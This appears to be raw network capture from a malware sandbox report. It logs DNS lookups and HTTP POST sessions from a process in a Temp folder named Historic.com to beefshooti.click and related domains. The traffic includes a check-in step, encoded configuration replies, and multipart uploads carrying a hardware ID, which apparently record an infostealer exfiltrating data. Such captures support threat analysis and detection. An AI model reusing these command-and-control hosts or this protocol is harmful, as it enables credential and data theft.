                                                                                        Dec 24, 2024 08:18:18.300266027 CET1.1.1.1192.168.2.60x791aNo error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:18.300266027 CET1.1.1.1192.168.2.60x791aNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:18.300266027 CET1.1.1.1192.168.2.60x791aNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:41.870614052 CET1.1.1.1192.168.2.60xd932No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:41.870614052 CET1.1.1.1192.168.2.60xd932No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:41.870614052 CET1.1.1.1192.168.2.60xd932No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:43.212152004 CET1.1.1.1192.168.2.60x9179No error (0)beefshooti.click104.21.18.185A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:43.212152004 CET1.1.1.1192.168.2.60x9179No error (0)beefshooti.click172.67.183.30A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:19:05.424583912 CET1.1.1.1192.168.2.60xf293No error (0)neqi.shop172.67.169.205A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:19:05.424583912 CET1.1.1.1192.168.2.60xf293No error (0)neqi.shop104.21.27.229A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:19:10.476272106 CET1.1.1.1192.168.2.60xf5d1Name error (3)klipcatepiu0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                        • beefshooti.click
                                                                                        • neqi.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649800104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:44 UTC263OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-24 07:18:45 UTC1121INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=pra6q7km3lmsu538b2je691k9p; expires=Sat, 19 Apr 2025 01:05:23 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvdk2qJljqlcKpi12xMk49sfds4wFhjDm78zBBSfTKlIBE%2B%2FVa7qmSpqts35nmlU1r1Fpi7RvpFuBR9vPCezpat%2Fz3aF71TChMulbe4zEfT0eYlXDjfQ7ReDmR7u8dbjoc3Z"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1b17cca5e70-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2203&min_rtt=2201&rtt_var=831&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=907&delivery_rate=1313540&cwnd=228&unsent_bytes=0&cid=7fa944620483c1b6&ts=755&x=0"
                                                                                        2024-12-24 07:18:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-24 07:18:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.649804104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:46 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 76
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:46 UTC76OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 34 26 6a 3d 35 66 38 33 61 37 35 66 62 37 30 33 33 31 32 39 64 65 34 35 62 34 30 33 32 38 35 61 36 37 32 33
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--l4&j=5f83a75fb7033129de45b403285a6723
                                                                                        2024-12-24 07:18:47 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=flu2i5ifuam6m7glturg3j1pac; expires=Sat, 19 Apr 2025 01:05:26 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4aB2TQ%2Fg4nL%2F%2B4v7nSHFRfncQ%2FPPcHRGeVc4DaL6n09COZY2no9mPfl5g0AmHXPb6zFo0XezyvqDVB%2FSaDSNhCTdvgOFTEz4W%2FRdeRGEAOe36HuZ1NGpmOhOrFGunsJPduT"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1be8e38c337-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1473&rtt_var=586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=976&delivery_rate=1817050&cwnd=203&unsent_bytes=0&cid=02a705cee081d0ec&ts=773&x=0"
                                                                                        2024-12-24 07:18:47 UTC242INData Raw: 63 34 39 0d 0a 38 71 39 4b 7a 75 34 32 43 4e 73 61 63 37 54 4e 69 49 33 6f 32 36 50 59 6b 61 46 2b 4c 41 58 2b 51 42 46 4a 5a 56 53 59 46 4b 53 4a 6a 54 7a 73 31 41 49 6b 2b 57 6b 57 6c 76 66 38 2f 35 32 2b 6a 2f 72 77 78 56 77 57 59 35 38 73 59 69 78 4a 64 75 35 35 68 73 6a 4a 4b 36 4b 64 55 79 54 35 66 77 75 57 39 39 50 32 79 72 37 4e 2b 71 75 44 47 30 5a 6e 6e 79 78 7a 4b 41 34 37 36 48 6a 48 6d 73 4d 74 70 6f 74 56 62 4c 70 32 48 74 47 6f 37 65 79 43 74 63 71 31 2b 63 78 63 41 43 65 62 4f 6a 4e 7a 52 78 6e 39 59 4d 57 2f 7a 6a 6d 6c 7a 45 73 6b 6f 44 67 57 32 75 2b 79 72 34 6d 2b 77 62 54 33 78 52 56 45 62 5a 59 6b 63 69 30 50 4a 50 46 79 7a 4a 72 4e 4c 71 65 42 58 48 69 33 66 42 6e 61 72 75 66 73 79 76 65 42 76
                                                                                        Data Ascii: c498q9Kzu42CNsac7TNiI3o26PYkaF+LAX+QBFJZVSYFKSJjTzs1AIk+WkWlvf8/52+j/rwxVwWY58sYixJdu55hsjJK6KdUyT5fwuW99P2yr7N+quDG0ZnnyxzKA476HjHmsMtpotVbLp2HtGo7eyCtcq1+cxcACebOjNzRxn9YMW/zjmlzEskoDgW2u+yr4m+wbT3xRVEbZYkci0PJPFyzJrNLqeBXHi3fBnarufsyveBv
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 65 75 44 52 41 34 30 72 69 46 69 4f 68 49 37 36 6e 43 47 6a 34 4d 78 37 49 74 59 4b 75 45 34 47 64 71 68 37 2b 79 46 76 73 43 36 34 63 77 63 54 57 2b 55 4a 6e 6b 6b 43 44 6e 30 66 4d 47 59 78 43 2b 6a 69 31 78 73 74 6e 74 52 6d 4f 2f 74 39 38 72 68 67 5a 72 6a 77 42 39 61 61 6f 31 69 62 47 55 65 64 76 31 36 68 73 69 4e 4c 71 4b 4e 57 57 71 72 63 42 72 64 71 76 6a 6b 67 37 54 4d 75 76 37 4a 45 30 31 6e 6d 79 68 35 4a 41 30 79 39 33 76 41 6b 4d 31 6f 34 73 78 54 63 76 6b 67 55 66 57 71 2b 75 69 47 72 34 4f 41 73 39 78 53 56 79 65 62 4c 6a 4e 7a 52 7a 37 2f 64 63 57 62 77 69 75 6b 68 30 5a 71 71 33 34 63 30 37 33 73 36 6f 53 7a 77 71 6a 35 7a 52 70 4e 62 70 63 72 64 69 77 44 64 72 51 32 77 59 69 4e 63 4f 79 74 57 57 47 31 63 67 62 57 37 2f 57 68 6b 2f 6e 47
                                                                                        Data Ascii: euDRA40riFiOhI76nCGj4Mx7ItYKuE4Gdqh7+yFvsC64cwcTW+UJnkkCDn0fMGYxC+ji1xstntRmO/t98rhgZrjwB9aao1ibGUedv16hsiNLqKNWWqrcBrdqvjkg7TMuv7JE01nmyh5JA0y93vAkM1o4sxTcvkgUfWq+uiGr4OAs9xSVyebLjNzRz7/dcWbwiukh0Zqq34c073s6oSzwqj5zRpNbpcrdiwDdrQ2wYiNcOytWWG1cgbW7/Whk/nG
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 70 42 61 70 42 69 50 57 73 41 4c 72 6f 75 68 72 72 4f 50 4b 2b 47 46 6c 2b 36 64 68 2f 52 75 61 72 77 78 4b 43 42 76 66 2b 44 52 41 35 71 6e 53 70 31 4f 51 67 37 2b 58 6a 49 6e 38 67 6e 70 49 78 55 5a 37 78 38 47 74 32 73 35 2b 75 59 73 38 47 79 39 73 49 57 52 43 66 53 59 6e 51 7a 52 32 36 36 52 39 47 62 6a 78 32 76 67 6c 70 74 72 7a 67 4f 6d 4c 61 71 36 49 62 35 6d 66 72 2b 79 78 6c 4c 61 4a 30 6f 66 53 34 4e 4f 76 4a 34 78 59 4c 43 4c 4b 79 41 58 47 43 30 64 68 58 65 70 75 48 6b 6a 4c 6e 41 73 4c 4f 4e 58 45 6c 2f 33 48 6f 7a 48 77 41 36 39 33 6d 45 70 63 34 6d 6f 6f 74 43 4b 71 59 32 43 4a 61 6f 35 71 2f 53 2b 63 32 7a 38 38 67 57 53 6d 65 62 4c 33 59 6f 41 44 58 33 63 63 79 65 79 69 79 67 68 56 6c 73 75 58 38 56 30 37 33 76 35 6f 61 31 67 66 53 7a 78
                                                                                        Data Ascii: pBapBiPWsALrouhrrOPK+GFl+6dh/RuarwxKCBvf+DRA5qnSp1OQg7+XjIn8gnpIxUZ7x8Gt2s5+uYs8Gy9sIWRCfSYnQzR266R9Gbjx2vglptrzgOmLaq6Ib5mfr+yxlLaJ0ofS4NOvJ4xYLCLKyAXGC0dhXepuHkjLnAsLONXEl/3HozHwA693mEpc4mootCKqY2CJao5q/S+c2z88gWSmebL3YoADX3ccyeyiyghVlsuX8V073v5oa1gfSzx
                                                                                        2024-12-24 07:18:47 UTC172INData Raw: 46 59 6e 51 6e 52 32 36 36 66 38 2b 43 77 79 61 6c 67 56 4a 69 76 6e 59 63 33 61 6e 68 36 49 32 2f 7a 4c 4c 2b 78 68 39 50 59 35 59 77 63 43 41 4e 4f 2f 41 32 69 4e 44 4b 4d 4f 7a 55 46 45 32 31 55 51 48 4e 76 66 79 76 6c 66 66 59 2b 76 54 50 58 42 59 6e 6e 79 31 36 4a 41 38 2b 39 58 6e 43 6e 73 73 75 6f 59 6c 62 59 4b 74 77 48 39 75 6b 35 65 53 59 75 63 79 2b 2f 38 63 55 52 57 33 63 62 44 4d 73 48 33 61 69 4e 76 4f 64 77 69 69 76 6d 68 52 31 39 32 46 52 30 61 4f 71 74 38 71 31 7a 37 72 38 7a 78 42 46 62 0d 0a
                                                                                        Data Ascii: FYnQnR266f8+CwyalgVJivnYc3anh6I2/zLL+xh9PY5YwcCANO/A2iNDKMOzUFE21UQHNvfyvlffY+vTPXBYnny16JA8+9XnCnssuoYlbYKtwH9uk5eSYucy+/8cURW3cbDMsH3aiNvOdwiivmhR192FR0aOqt8q1z7r8zxBFb
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 34 33 30 34 0d 0a 35 30 75 66 53 77 43 50 2f 4a 2b 31 4a 48 4a 49 4b 32 43 57 32 75 39 66 52 54 53 71 4f 37 70 68 66 6d 50 2b 76 54 62 58 42 59 6e 73 77 56 47 61 53 59 4d 75 6d 6d 49 69 59 30 76 6f 4d 77 4d 4b 72 56 37 48 64 36 67 37 4f 61 47 73 38 69 78 2f 38 67 59 51 6d 36 5a 4a 48 49 75 41 6a 66 2b 65 73 79 57 7a 69 75 6a 67 31 74 69 2b 54 5a 52 30 62 65 71 74 38 71 63 31 72 48 39 78 56 78 52 4b 59 56 69 64 43 64 48 62 72 70 36 7a 35 62 4c 4c 61 43 4e 55 6d 4b 38 63 42 58 58 71 65 7a 73 68 62 33 45 75 2f 7a 48 45 45 42 74 6e 53 4e 2f 49 41 67 39 2f 7a 61 49 30 4d 6f 77 37 4e 51 55 57 37 70 75 42 73 61 6a 71 76 44 45 6f 49 47 39 2f 34 4e 45 44 6d 61 4f 4b 48 6b 6c 41 6a 6e 2f 64 63 6d 58 77 43 36 67 68 6c 31 69 76 33 63 59 78 4b 7a 6d 34 59 32 33 7a 62
                                                                                        Data Ascii: 430450ufSwCP/J+1JHJIK2CW2u9fRTSqO7phfmP+vTbXBYnswVGaSYMummIiY0voMwMKrV7Hd6g7OaGs8ix/8gYQm6ZJHIuAjf+esyWziujg1ti+TZR0beqt8qc1rH9xVxRKYVidCdHbrp6z5bLLaCNUmK8cBXXqezshb3Eu/zHEEBtnSN/IAg9/zaI0Mow7NQUW7puBsajqvDEoIG9/4NEDmaOKHklAjn/dcmXwC6ghl1iv3cYxKzm4Y23zb
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 53 57 43 56 4b 57 45 68 41 44 48 78 66 73 32 66 79 7a 71 67 67 6b 5a 76 71 32 70 52 6d 4f 2f 74 39 38 72 68 67 59 7a 30 30 77 78 4e 4a 61 30 30 63 44 30 4d 4f 2f 59 32 32 64 37 55 61 4b 75 41 46 44 4c 35 66 68 37 66 72 4f 58 75 67 37 58 4d 76 2f 72 47 48 55 68 6a 6c 69 68 7a 4c 51 45 33 2f 33 7a 46 6b 63 63 68 71 34 52 54 61 61 73 34 58 35 61 6f 38 71 2f 53 2b 65 69 39 34 63 30 4d 44 6e 6a 53 4f 7a 4d 73 43 33 61 69 4e 73 4b 61 77 69 79 72 67 46 4a 76 76 33 55 51 32 61 37 71 34 49 36 79 79 4c 7a 79 7a 68 6c 44 59 34 34 6f 65 43 51 4c 50 2f 5a 37 68 74 36 4e 4c 37 54 4d 44 43 71 49 64 52 2f 59 71 50 79 76 6c 66 66 59 2b 76 54 50 58 42 59 6e 6e 53 35 38 4b 41 67 31 2b 58 66 4d 67 74 38 6b 70 59 52 52 5a 72 4a 32 46 38 53 70 35 65 61 4a 75 73 69 39 2b 38 38
                                                                                        Data Ascii: SWCVKWEhADHxfs2fyzqggkZvq2pRmO/t98rhgYz00wxNJa00cD0MO/Y22d7UaKuAFDL5fh7frOXug7XMv/rGHUhjlihzLQE3/3zFkcchq4RTaas4X5ao8q/S+ei94c0MDnjSOzMsC3aiNsKawiyrgFJvv3UQ2a7q4I6yyLzyzhlDY44oeCQLP/Z7ht6NL7TMDCqIdR/YqPyvlffY+vTPXBYnnS58KAg1+XfMgt8kpYRRZrJ2F8Sp5eaJusi9+88
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 7a 4d 7a 63 78 45 6d 37 58 48 5a 33 74 52 6f 71 34 41 55 4d 76 6c 2b 47 4e 43 6f 37 4f 47 59 76 4d 65 31 2f 4d 6f 56 53 6d 2b 66 49 6e 63 76 41 44 50 35 65 73 32 58 7a 69 65 6f 68 56 70 6a 74 6a 68 66 6c 71 6a 79 72 39 4c 35 34 4b 48 77 7a 78 45 4f 65 4e 49 37 4d 79 77 4c 64 71 49 32 79 70 37 49 4b 4b 61 4b 55 47 2b 2f 63 68 54 57 70 4f 6e 67 6a 72 2f 46 74 66 50 49 46 55 39 68 6d 53 68 34 4c 51 6f 31 2f 48 43 47 33 6f 30 76 74 4d 77 4d 4b 70 6c 6a 48 4e 71 6f 71 76 44 45 6f 49 47 39 2f 34 4e 45 44 6d 79 51 4a 6e 51 72 43 6a 58 79 63 38 4b 61 79 43 69 6b 6e 6c 78 71 76 6d 6f 44 31 71 62 76 34 34 6d 35 78 62 7a 36 78 52 39 4b 4a 39 4a 69 64 44 4e 48 62 72 70 62 79 70 66 6b 4c 37 66 4d 53 79 53 67 4f 42 62 61 37 37 4b 76 69 37 4c 4c 74 66 37 41 47 6b 31 73
                                                                                        Data Ascii: zMzcxEm7XHZ3tRoq4AUMvl+GNCo7OGYvMe1/MoVSm+fIncvADP5es2XzieohVpjtjhflqjyr9L54KHwzxEOeNI7MywLdqI2yp7IKKaKUG+/chTWpOngjr/FtfPIFU9hmSh4LQo1/HCG3o0vtMwMKpljHNqoqvDEoIG9/4NEDmyQJnQrCjXyc8KayCiknlxqvmoD1qbv44m5xbz6xR9KJ9JidDNHbrpbypfkL7fMSySgOBba77Kvi7LLtf7AGk1s
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 4e 56 65 4c 70 6b 68 73 69 4e 62 36 2b 65 52 6d 79 36 62 68 4b 52 6b 64 54 49 6b 4c 54 48 72 65 4c 39 49 6b 6c 39 6b 53 52 6b 4f 6b 73 6a 2b 58 6a 49 6c 39 74 6f 34 73 78 62 4b 75 46 42 55 5a 37 76 31 61 48 4b 6f 59 48 69 73 2f 59 66 51 47 6d 62 4e 47 4a 6d 49 43 7a 33 63 4e 47 42 6a 57 62 73 69 68 51 79 36 54 5a 52 30 72 36 71 74 39 72 72 6d 75 2b 67 6c 45 77 63 65 4e 49 37 4d 7a 31 48 62 71 67 34 68 6f 4b 4e 63 4f 7a 4c 56 33 69 72 66 68 4c 41 72 4b 33 52 74 4a 66 47 76 50 62 45 44 41 78 4a 6c 7a 5a 30 61 30 6c 32 39 54 61 65 71 59 31 67 37 4c 4d 61 4b 71 45 34 53 5a 61 61 36 65 47 45 76 74 65 72 76 75 30 62 53 47 4b 62 4d 6a 45 46 44 43 4c 39 4e 6f 6a 51 79 32 6a 30 33 42 6f 71 76 57 6c 52 6a 76 2b 34 74 4e 2f 71 6c 75 71 68 33 46 4a 58 4a 34 70 69 4b
                                                                                        Data Ascii: NVeLpkhsiNb6+eRmy6bhKRkdTIkLTHreL9Ikl9kSRkOksj+XjIl9to4sxbKuFBUZ7v1aHKoYHis/YfQGmbNGJmICz3cNGBjWbsihQy6TZR0r6qt9rrmu+glEwceNI7Mz1Hbqg4hoKNcOzLV3irfhLArK3RtJfGvPbEDAxJlzZ0a0l29TaeqY1g7LMaKqE4SZaa6eGEvtervu0bSGKbMjEFDCL9NojQy2j03BoqvWlRjv+4tN/qluqh3FJXJ4piK
                                                                                        2024-12-24 07:18:47 UTC1369INData Raw: 45 59 38 57 65 77 79 2b 36 6e 52 51 6b 2b 58 64 52 6a 70 61 71 70 38 71 47 6a 2f 72 72 67 30 51 4f 55 70 38 73 66 53 77 52 4a 37 64 52 79 4a 66 4d 50 72 79 62 57 79 57 58 54 6a 43 57 34 61 72 70 79 75 47 54 39 4c 50 48 44 51 34 2f 7a 48 41 6f 66 6c 52 68 71 69 54 5a 33 74 52 6f 75 73 77 4d 4f 50 63 34 41 35 62 33 71 71 69 4a 71 39 4f 38 38 4e 55 66 43 56 6d 69 42 58 30 73 42 69 44 71 65 38 71 78 7a 6a 6d 6d 73 6d 70 2f 75 6e 59 66 30 62 6e 37 72 38 54 35 7a 76 71 72 2b 6c 77 47 4a 36 4e 73 4d 7a 4e 48 62 72 70 44 78 5a 37 44 4c 37 71 64 47 55 32 33 66 78 44 41 76 2b 66 6a 71 37 72 51 73 4c 4f 4e 58 45 67 6e 78 48 41 39 61 77 4d 6e 75 69 36 57 77 70 5a 39 2f 39 73 45 4f 4b 59 32 43 4a 61 35 71 72 66 59 39 34 47 6f 73 35 74 63 43 57 53 4f 4d 48 55 6f 45 54
                                                                                        Data Ascii: EY8Wewy+6nRQk+XdRjpaqp8qGj/rrg0QOUp8sfSwRJ7dRyJfMPrybWyWXTjCW4arpyuGT9LPHDQ4/zHAoflRhqiTZ3tRouswMOPc4A5b3qqiJq9O88NUfCVmiBX0sBiDqe8qxzjmmsmp/unYf0bn7r8T5zvqr+lwGJ6NsMzNHbrpDxZ7DL7qdGU23fxDAv+fjq7rQsLONXEgnxHA9awMnui6WwpZ9/9sEOKY2CJa5qrfY94Gos5tcCWSOMHUoET


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.649816104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:48 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=HOFSZB3NXG21F57
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12838
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:48 UTC12838OUTData Raw: 2d 2d 48 4f 46 53 5a 42 33 4e 58 47 32 31 46 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 48 4f 46 53 5a 42 33 4e 58 47 32 31 46 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 4f 46 53 5a 42 33 4e 58 47 32 31 46 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34 0d 0a 2d 2d 48 4f 46 53 5a 42 33 4e
                                                                                        Data Ascii: --HOFSZB3NXG21F57Content-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--HOFSZB3NXG21F57Content-Disposition: form-data; name="pid"2--HOFSZB3NXG21F57Content-Disposition: form-data; name="lid"jMw1IE--l4--HOFSZB3N
                                                                                        2024-12-24 07:18:49 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=0a9vapcehbjnhvipr7klglt6a2; expires=Sat, 19 Apr 2025 01:05:28 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWmbli3GoIot0JhQpOg3q%2BtU%2Fwk%2FDEPM6vtPY91mtzoh4JVptCXrg3qBeq3ICoIxP%2Bm7ofXcCVtVoGUCiGz5Y79%2FC4QO%2BhrSavfYuDesQVY7Bv6mt0vSWzxanpiN8CiqkYqI"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1cc6fff422b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1702&rtt_var=644&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13775&delivery_rate=1689814&cwnd=220&unsent_bytes=0&cid=888976795973ee32&ts=953&x=0"
                                                                                        2024-12-24 07:18:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-24 07:18:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.649823104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:51 UTC280OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=WA8MYOEBFSIEMI6M
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15090
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:51 UTC15090OUTData Raw: 2d 2d 57 41 38 4d 59 4f 45 42 46 53 49 45 4d 49 36 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 57 41 38 4d 59 4f 45 42 46 53 49 45 4d 49 36 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 38 4d 59 4f 45 42 46 53 49 45 4d 49 36 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34 0d 0a 2d 2d 57 41 38 4d 59
                                                                                        Data Ascii: --WA8MYOEBFSIEMI6MContent-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--WA8MYOEBFSIEMI6MContent-Disposition: form-data; name="pid"2--WA8MYOEBFSIEMI6MContent-Disposition: form-data; name="lid"jMw1IE--l4--WA8MY
                                                                                        2024-12-24 07:18:51 UTC1124INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=4dra74drkmnn33c1j63smplp8p; expires=Sat, 19 Apr 2025 01:05:30 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
